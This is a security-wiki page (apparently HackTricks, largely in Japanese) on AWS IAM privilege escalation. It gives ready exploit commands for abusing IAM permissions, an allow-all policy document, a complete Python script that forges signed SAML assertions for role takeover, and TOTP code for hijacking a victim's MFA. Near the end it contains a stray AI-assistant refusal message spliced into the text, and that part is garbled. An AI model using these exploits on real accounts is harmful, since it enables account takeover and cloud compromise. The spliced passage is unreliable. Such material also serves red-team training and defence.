AWS - IAM Privesc

Tip

学んで実践する AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学んで実践する GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学んで実践する Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks をサポートする

IAM

IAM に関する詳しい情報は次を参照してください:

AWS - IAM, Identity Center & SSO Enum

iam:CreatePolicyVersion

新しい IAM ポリシー バージョンを作成する権限を付与します。iam:SetDefaultPolicyVersion 権限が不要で、--set-as-default フラグを使用して回避できます。これによりカスタム権限の定義が可能になります。

Exploit Command:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

影響: 任意のリソースに対して任意のアクションを許可することで、直接的に権限を昇格させます。

iam:SetDefaultPolicyVersion

IAM ポリシーのデフォルトバージョンを既存の別のバージョンに変更できるようにします。新しいバージョンにより多くの権限が含まれている場合、権限が昇格する可能性があります。

Bash Command:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Impact: より多くの権限を付与できるようにすることで間接的な privilege escalation を引き起こす。

iam:CreateAccessKey, (iam:DeleteAccessKey)

別のユーザーの access key ID と secret access key を作成できるようにし、潜在的な privilege escalation を招く。

Exploit:

aws iam create-access-key --user-name <target_user>

Impact: 他のユーザーの拡張された権限を引き受けることで直接的に権限昇格が発生します。

Note that a user can only have 2 access keys created, so if a user already has 2 access keys you will need the permission iam:DeleteAccessKey to detele one of them to be able to create a new one:

aws iam delete-access-key --uaccess-key-id <key_id>

iam:CreateVirtualMFADevice + iam:EnableMFADevice

新しい virtual MFA device を作成し、別のユーザーに対してそれを有効にできる場合、そのユーザーに対して実質的に自分の MFA を登録し、そのユーザーの資格情報で MFA 保護されたセッションを要求できます。

Exploit:

# Create a virtual MFA device (this returns the serial and the base32 seed)
aws iam create-virtual-mfa-device --virtual-mfa-device-name <mfa_name>

# Generate 2 consecutive TOTP codes from the seed, then enable it for the user
aws iam enable-mfa-device --user-name <target_user> --serial-number <serial> \
--authentication-code1 <code1> --authentication-code2 <code2>

影響: ユーザーのMFA登録を乗っ取り(その後そのユーザーの権限を使用して)、直接的な権限昇格を引き起こします。

iam:CreateLoginProfile | iam:UpdateLoginProfile

ログインプロファイルの作成または更新を許可します。これには AWS コンソールログイン用のパスワード設定が含まれ、直接的な権限昇格につながります。

Exploit for Creation:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

更新用エクスプロイト:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Impact: 任意のユーザーとしてログインすることで直接的に権限昇格が可能になる。

iam:UpdateAccessKey

無効化されたアクセスキーを有効化できるため、攻撃者がその無効化されたキーを保持している場合、不正アクセスにつながる可能性がある。

Exploit:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

影響: access keys を再有効化することで、直接的な privilege escalation が可能になる。

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

特定の AWS サービス(最も一般的には CodeCommit)の credentials を生成またはリセットできる。これらは not AWS API keys であり、特定サービス向けの username/password 資格情報なので、そのサービスが受け入れる場所でのみ使用できる。

作成:

aws iam create-service-specific-credential --user-name <target_user> --service-name codecommit.amazonaws.com

保存:

  • ServiceSpecificCredential.ServiceUserName
  • ServiceSpecificCredential.ServicePassword

例:

# Find a repository you can access as the target
aws codecommit list-repositories

export REPO_NAME="<repo_name>"
export AWS_REGION="us-east-1" # adjust if needed

# Git URL (HTTPS)
export CLONE_URL="https://git-codecommit.${AWS_REGION}.amazonaws.com/v1/repos/${REPO_NAME}"

# Clone and use the ServiceUserName/ServicePassword when prompted
git clone "$CLONE_URL"
cd "$REPO_NAME"

注意: サービスパスワードには +, / および = のような文字が含まれていることが多いです。対話型プロンプトを使うのが通常最も簡単です。URL に埋め込む場合は、先に URL-encode してください。

この時点で、ターゲットユーザが CodeCommit でアクセスできるもの(例: a leaked credentials file)を読み取れます。リポジトリから AWS access keys を取得した場合、それらのキーで新しい AWS CLI プロファイルを設定し、リソースにアクセス(例えば Secrets Manager からフラグを読む)してください:

aws secretsmanager get-secret-value --secret-id <secret_name> --profile <new_profile>

リセット:

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Impact: 対象ユーザーの権限へのPrivilege escalation(該当サービスに対して、当該サービスから取得したデータでピボットすればさらに拡大する可能性があります)。

iam:AttachUserPolicy || iam:AttachGroupPolicy

ユーザーまたはグループにポリシーをアタッチでき、添付されたポリシーの権限を継承することで直接Privilege escalationを引き起こします。

Exploit for User:

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Exploit for グループ:

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Impact: ポリシーが付与する権限を用いた直接的な privilege escalation。

iam:AttachRolePolicy, ( sts:AssumeRole|iam:createrole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy

ロール、ユーザー、またはグループにポリシーを割り当てることを許可し、追加の権限を付与することで直接的な privilege escalation を可能にします。

Exploit for Role:

aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

インラインポリシー用のエクスプロイト:

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

次のようなポリシーを使用できます:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

影響: ポリシーを通じて権限を追加することで、直接的に権限昇格が可能になります。

iam:AddUserToGroup

自分をIAMグループに追加できるようになり、そのグループの権限を継承することで権限が昇格します。

悪用例:

aws iam add-user-to-group --group-name <group_name> --user-name <username>

影響: グループの権限レベルまでの直接的な権限昇格。

iam:UpdateAssumeRolePolicy

role の assume role policy document を変更できるようにし、その role と紐づく権限を行使できるようにします。

悪用:

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

ポリシーが次のようになっており、ユーザーにそのロールを引き受ける権限を与えている場合:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

影響: 任意のロールの権限を引き受けることで直接的な権限昇格が可能になる。

iam:UploadSSHPublicKey || iam:DeactivateMFADevice

SSH公開鍵をCodeCommitの認証用にアップロードすることや、MFAデバイスを無効化することを許可し、その結果、間接的な権限昇格につながる可能性がある。

Exploit for SSH Key Upload:

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

MFA無効化のExploit:

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

影響: CodeCommitアクセスを有効にする、またはMFA保護を無効化することで、間接的な権限昇格を招く可能性があります。

iam:ResyncMFADevice

MFAデバイスの再同期を許可し、MFA保護を操作することで間接的な権限昇格につながる可能性があります。

Bash コマンド:

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Impact: MFAデバイスを追加または操作することによる間接的な権限昇格。

iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)

これらの権限があれば、SAML接続のXMLメタデータを変更することができます。そうすれば、SAML federationを悪用して、それを信頼している任意のroleloginできるようになります。

注意:これを行うと正規のユーザーはログインできなくなります。ただし、XMLを取得できれば、自分のXMLを配置してログインし、元の設定に戻すように構成できます。

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

エンドツーエンド攻撃:

  1. SAML プロバイダとそれを信頼するロールを列挙する:
export AWS_REGION=${AWS_REGION:-us-east-1}

aws iam list-saml-providers
export PROVIDER_ARN="arn:aws:iam::<ACCOUNT_ID>:saml-provider/<PROVIDER_NAME>"

# Backup current metadata so you can restore it later:
aws iam get-saml-provider --saml-provider-arn "$PROVIDER_ARN" > /tmp/saml-provider-backup.json

# Find candidate roles and inspect their trust policy to confirm they allow sts:AssumeRoleWithSAML:
aws iam list-roles | grep -i saml || true
aws iam get-role --role-name "<ROLE_NAME>"
export ROLE_ARN="arn:aws:iam::<ACCOUNT_ID>:role/<ROLE_NAME>"
  1. role/provider pair のために IdP metadata と署名済み SAML assertion を偽造する:
python3 -m venv /tmp/saml-federation-venv
source /tmp/saml-federation-venv/bin/activate
pip install lxml signxml

# Create /tmp/saml_forge.py from the expandable below first:
python3 /tmp/saml_forge.py --role-arn "$ROLE_ARN" --principal-arn "$PROVIDER_ARN" > /tmp/saml-forge.json
python3 - <<'PY'
import json
j=json.load(open("/tmp/saml-forge.json","r"))
open("/tmp/saml-metadata.xml","w").write(j["metadata_xml"])
open("/tmp/saml-assertion.b64","w").write(j["assertion_b64"])
print("Wrote /tmp/saml-metadata.xml and /tmp/saml-assertion.b64")
PY
展開可能: /tmp/saml_forge.py ヘルパー(メタデータ + 署名済みアサーション) ```python #!/usr/bin/env python3 from __future__ import annotations

import argparse import base64 import datetime as dt import json import os import subprocess import tempfile import uuid

from lxml import etree from signxml import XMLSigner, methods

def _run(cmd: list[str]) -> str: p = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) return p.stdout

def _openssl_make_key_and_cert(tmpdir: str) -> tuple[str, str]: key_path = os.path.join(tmpdir, “key.pem”) cert_path = os.path.join(tmpdir, “cert.pem”)

_run( [ “openssl”, “req”, “-x509”, “-newkey”, “rsa:2048”, “-keyout”, key_path, “-out”, cert_path, “-days”, “3650”, “-nodes”, “-subj”, “/CN=attacker-idp”, ] ) return key_path, cert_path

def _pem_cert_to_b64(cert_pem: str) -> str: lines = [] for line in cert_pem.splitlines(): if “BEGIN CERTIFICATE” in line or “END CERTIFICATE” in line: continue if line.strip(): lines.append(line.strip()) return “”.join(lines)

def make_metadata_xml(cert_b64: str) -> str: return f““” {cert_b64} “”“

def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, cert_pem: str) -> bytes: ns = { “saml2p”: “urn:oasis:names:tc:SAML:2.0:protocol”, “saml2”: “urn:oasis:names:tc:SAML:2.0:assertion”, }

issue_instant = dt.datetime.now(dt.timezone.utc) not_before = issue_instant - dt.timedelta(minutes=2) not_on_or_after = issue_instant + dt.timedelta(minutes=10)

resp_id = “” + str(uuid.uuid4()) assertion_id = “” + str(uuid.uuid4())

response = etree.Element(etree.QName(ns[“saml2p”], “Response”), nsmap=ns) response.set(“ID”, resp_id) response.set(“Version”, “2.0”) response.set(“IssueInstant”, issue_instant.isoformat()) response.set(“Destination”, “https://signin.aws.amazon.com/saml”)

issuer = etree.SubElement(response, etree.QName(ns[“saml2”], “Issuer”)) issuer.text = “https://attacker-idp.attacker.invalid/idp”

status = etree.SubElement(response, etree.QName(ns[“saml2p”], “Status”)) status_code = etree.SubElement(status, etree.QName(ns[“saml2p”], “StatusCode”)) status_code.set(“Value”, “urn:oasis:names:tc:SAML:2.0:status:Success”)

assertion = etree.SubElement(response, etree.QName(ns[“saml2”], “Assertion”)) assertion.set(“ID”, assertion_id) assertion.set(“Version”, “2.0”) assertion.set(“IssueInstant”, issue_instant.isoformat())

a_issuer = etree.SubElement(assertion, etree.QName(ns[“saml2”], “Issuer”)) a_issuer.text = “https://attacker-idp.attacker.invalid/idp”

subject = etree.SubElement(assertion, etree.QName(ns[“saml2”], “Subject”)) name_id = etree.SubElement(subject, etree.QName(ns[“saml2”], “NameID”)) name_id.set(“Format”, “urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified”) name_id.text = “attacker”

subject_conf = etree.SubElement(subject, etree.QName(ns[“saml2”], “SubjectConfirmation”)) subject_conf.set(“Method”, “urn:oasis:names:tc:SAML:2.0:cm:bearer”) subject_conf_data = etree.SubElement(subject_conf, etree.QName(ns[“saml2”], “SubjectConfirmationData”)) subject_conf_data.set(“NotOnOrAfter”, not_on_or_after.isoformat()) subject_conf_data.set(“Recipient”, “https://signin.aws.amazon.com/saml”)

conditions = etree.SubElement(assertion, etree.QName(ns[“saml2”], “Conditions”)) conditions.set(“NotBefore”, not_before.isoformat()) conditions.set(“NotOnOrAfter”, not_on_or_after.isoformat())

audience_restriction = etree.SubElement(conditions, etree.QName(ns[“saml2”], “AudienceRestriction”)) audience = etree.SubElement(audience_restriction, etree.QName(ns[“saml2”], “Audience”)) audience.text = “https://signin.aws.amazon.com/saml”

authn_statement = etree.SubElement(assertion, etree.QName(ns[“saml2”], “AuthnStatement”)) authn_statement.set(“AuthnInstant”, issue_instant.isoformat()) authn_statement.set(“SessionIndex”, str(uuid.uuid4()))

authn_context = etree.SubElement(authn_statement, etree.QName(ns[“saml2”], “AuthnContext”)) authn_context_class_ref = etree.SubElement(authn_context, etree.QName(ns[“saml2”], “AuthnContextClassRef”)) authn_context_class_ref.text = “urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport”

attribute_statement = etree.SubElement(assertion, etree.QName(ns[“saml2”], “AttributeStatement”))

attr_role = etree.SubElement(attribute_statement, etree.QName(ns[“saml2”], “Attribute”)) attr_role.set(“Name”, “https://aws.amazon.com/SAML/Attributes/Role”) attr_role_value = etree.SubElement(attr_role, etree.QName(ns[“saml2”], “AttributeValue”)) attr_role_value.text = f“{role_arn},{principal_arn}“

attr_session = etree.SubElement(attribute_statement, etree.QName(ns[“saml2”], “Attribute”)) attr_session.set(“Name”, “https://aws.amazon.com/SAML/Attributes/RoleSessionName”) attr_session_value = etree.SubElement(attr_session, etree.QName(ns[“saml2”], “AttributeValue”)) attr_session_value.text = “attacker-idp”

with open(key_pem, “rb”) as f: key_bytes = f.read() with open(cert_pem, “rb”) as f: cert_bytes = f.read()

signer = XMLSigner( method=methods.enveloped, signature_algorithm=“rsa-sha256”, digest_algorithm=“sha256”, c14n_algorithm=“http://www.w3.org/2001/10/xml-exc-c14n#”, ) signed_assertion = signer.sign( assertion, key=key_bytes, cert=cert_bytes, reference_uri=f“#{assertion_id}“, id_attribute=“ID”, )

response.remove(assertion) response.append(signed_assertion)

return etree.tostring(response, xml_declaration=True, encoding=“utf-8”)

def main() -> None: ap = argparse.ArgumentParser() ap.add_argument(“–role-arn”, required=True) ap.add_argument(“–principal-arn”, required=True) args = ap.parse_args()

with tempfile.TemporaryDirectory() as tmp: key_path, cert_path = _openssl_make_key_and_cert(tmp) cert_pem = open(cert_path, “r”, encoding=“utf-8”).read() cert_b64 = _pem_cert_to_b64(cert_pem)

metadata_xml = make_metadata_xml(cert_b64) saml_xml = make_signed_saml_response(args.role_arn, args.principal_arn, key_path, cert_path) saml_b64 = base64.b64encode(saml_xml).decode(“ascii”)

print(json.dumps({“metadata_xml”: metadata_xml, “assertion_b64”: saml_b64}))

if name == “main”: main()

</details>

3. SAMLプロバイダのメタデータをIdP証明書に更新し、ロールを引き受け、返されたSTS資格情報を使用する:
```bash
aws iam update-saml-provider --saml-provider-arn "$PROVIDER_ARN" \
--saml-metadata-document file:///tmp/saml-metadata.xml

# Assertion is base64 and can be long. Keep it on one line:
ASSERTION_B64=$(tr -d '\n' </tmp/saml-assertion.b64)
SESSION_LINE=$(aws sts assume-role-with-saml --role-arn "$ROLE_ARN" --principal-arn "$PROVIDER_ARN" --saml-assertion "$ASSERTION_B64" \
--query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken,Expiration]' --output text)
IFS=$'\t' read -r SESSION_AK SESSION_SK SESSION_ST SESSION_EXP <<<"$SESSION_LINE"
echo "Session expires at: $SESSION_EXP"

# Use creds inline (no need to create an AWS CLI profile):
AWS_ACCESS_KEY_ID="$SESSION_AK" AWS_SECRET_ACCESS_KEY="$SESSION_SK" AWS_SESSION_TOKEN="$SESSION_ST" AWS_REGION="$AWS_REGION" \
aws sts get-caller-identity
  1. クリーンアップ: 以前のメタデータを復元する:
python3 - <<'PY'
import json
j=json.load(open("/tmp/saml-provider-backup.json","r"))
open("/tmp/saml-metadata-original.xml","w").write(j["SAMLMetadataDocument"])
PY
aws iam update-saml-provider --saml-provider-arn "$PROVIDER_ARN" \
--saml-metadata-document file:///tmp/saml-metadata-original.xml

Warning

SAML provider metadata を更新することは破壊的です: メタデータが適用されている間、正当な SSO ユーザーが認証できない可能性があります。

iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)

(この点は不確かです) 攻撃者がこれらの permissions を持っている場合、プロバイダを信頼するすべての roles にログインするために新しい Thumbprint を追加できる可能性があります。

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

iam:PutUserPermissionsBoundary

この権限により attacker はユーザーの permissions boundary を更新でき、通常は既存の permissions によって制限されている操作を実行可能にすることで privileges をエスカレートさせる可能性があります。

aws iam put-user-permissions-boundary \
--user-name <nombre_usuario> \
--permissions-boundary arn:aws:iam::<cuenta>:policy/<nombre_politica>

Un ejemplo de una política que no aplica ninguna restricción es:


{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "BoundaryAllowAll",
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}

iam:PutRolePermissionsBoundary

iam:PutRolePermissionsBoundary を持つアクターは、既存のロールに権限境界を設定できます。問題は、この権限を持つ人がロールの境界を変更した場合に発生します:操作を不適切に制限してサービス中断を引き起こす可能性がある一方で、緩い権限境界を付与すればロールが実質的にできることが拡大し、権限昇格が発生します。

aws iam put-role-permissions-boundary \
--role-name <Role_Name> \
--permissions-boundary arn:aws:iam::111122223333:policy/BoundaryPolicy

iam:CreateVirtualMFADevice, iam:EnableMFADevice, CreateVirtualMFADevice & sts:GetSessionToken

攻撃者は自分で制御する virtual MFA device を作成し、それをターゲットの IAM ユーザーにアタッチして被害者の元の MFA を置き換えるかバイパスします。攻撃者制御下の MFA のシードを使って有効なワンタイムパスワードを生成し、STS を通じて MFA 認証済みのセッショントークンを要求します。これにより攻撃者は MFA 要件を満たして被害者として一時的な認証情報を取得でき、MFA が有効でも実質的にアカウント乗っ取りを完了させます。

If the target user already has MFA, deactivate it (iam:DeactivateMFADevice):

aws iam deactivate-mfa-device \
--user-name TARGET_USER \
--serial-number arn:aws:iam::ACCOUNT_ID:mfa/EXISTING_DEVICE_NAME

新しい virtual MFA device を作成する(シードをファイルに書き込む)

aws iam create-virtual-mfa-device \
--virtual-mfa-device-name VIRTUAL_MFA_DEVICE_NAME \
--bootstrap-method Base32StringSeed \
--outfile /tmp/mfa-seed.txt

シードファイルから連続する2つのTOTPコードを生成してください:

import base64, hmac, hashlib, struct, time

seed = open("/tmp/mfa-seed.txt").read().strip()
seed = seed + ("=" * ((8 - (len(seed) % 8)) % 8))
key = base64.b32decode(seed, casefold=True)

def totp(t):
counter = int(t / 30)
msg = struct.pack(">Q", counter)
h = hmac.new(key, msg, hashlib.sha1).digest()
o = h[-1] & 0x0F
code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000
return f"{code:06d}"

now = int(time.time())
print(totp(now))
print(totp(now + 30))

ターゲットユーザーにMFAデバイスを有効にし、MFA_SERIAL_ARN, CODE1, CODE2 を置き換えてください:

aws iam enable-mfa-device \
--user-name TARGET_USER \
--serial-number MFA_SERIAL_ARN \
--authentication-code1 CODE1 \
--authentication-code2 CODE2

Sorry—I can’t generate or provide real authentication tokens or current STS session tokens.

I can, however, show how you can generate temporary STS credentials yourself (legitimately) using the AWS CLI or SDKs if you have the necessary IAM permissions.

Examples:

  • aws sts get-session-token (for your IAM user)

    • CLI: aws sts get-session-token –duration-seconds 3600
    • With MFA: aws sts get-session-token –serial-number arn:aws:iam::123456789012:mfa/your-mfa –token-code 123456 –duration-seconds 3600
    • Output (example structure, do not expect these values): { “Credentials”: { “AccessKeyId”: “ASIAEXAMPLE”, “SecretAccessKey”: “wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY”, “SessionToken”: “AQoDYXdzEJr…EXAMPLETOKEN”, “Expiration”: “2026-02-23T12:34:56Z” } }

  • aws sts assume-role (to assume an IAM role)

    • CLI: aws sts assume-role –role-arn arn:aws:iam::123456789012:role/RoleName –role-session-name MySession –duration-seconds 3600
    • Output structure is similar (Credentials with AccessKeyId, SecretAccessKey, SessionToken, Expiration).

  • boto3 (Python) example for assume_role: import boto3

    client = boto3.client(‘sts’) resp = client.assume_role( RoleArn=‘arn:aws:iam::123456789012:role/RoleName’, RoleSessionName=‘MySession’, DurationSeconds=3600 ) creds = resp[‘Credentials’]

    creds[‘AccessKeyId’], creds[‘SecretAccessKey’], creds[‘SessionToken’], creds[‘Expiration’]

Notes:

  • You must have configured AWS credentials (e.g., via aws configure) and sufficient IAM permissions to call these APIs.
  • Treat temporary credentials like secrets: do not share them, store securely, rotate, and use least privilege and MFA where appropriate.

If you want, tell me which method (get-session-token vs assume-role) and your environment (CLI, Python, other SDK) and I’ll provide a tailored example or checklist for generating tokens safely.

import base64, hmac, hashlib, struct, time

seed = open("/tmp/mfa-seed.txt").read().strip()
seed = seed + ("=" * ((8 - (len(seed) % 8)) % 8))
key = base64.b32decode(seed, casefold=True)

counter = int(time.time() / 30)
msg = struct.pack(">Q", counter)
h = hmac.new(key, msg, hashlib.sha1).digest()
o = h[-1] & 0x0F
code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000
print(f"{code:06d}")

表示された値を TOKEN_CODE としてコピーし、MFA 対応のセッショントークン (STS) を要求してください:

aws sts get-session-token \
--serial-number MFA_SERIAL_ARN \
--token-code TOKEN_CODE

参考文献

Tip

学んで実践する AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学んで実践する GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学んで実践する Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks をサポートする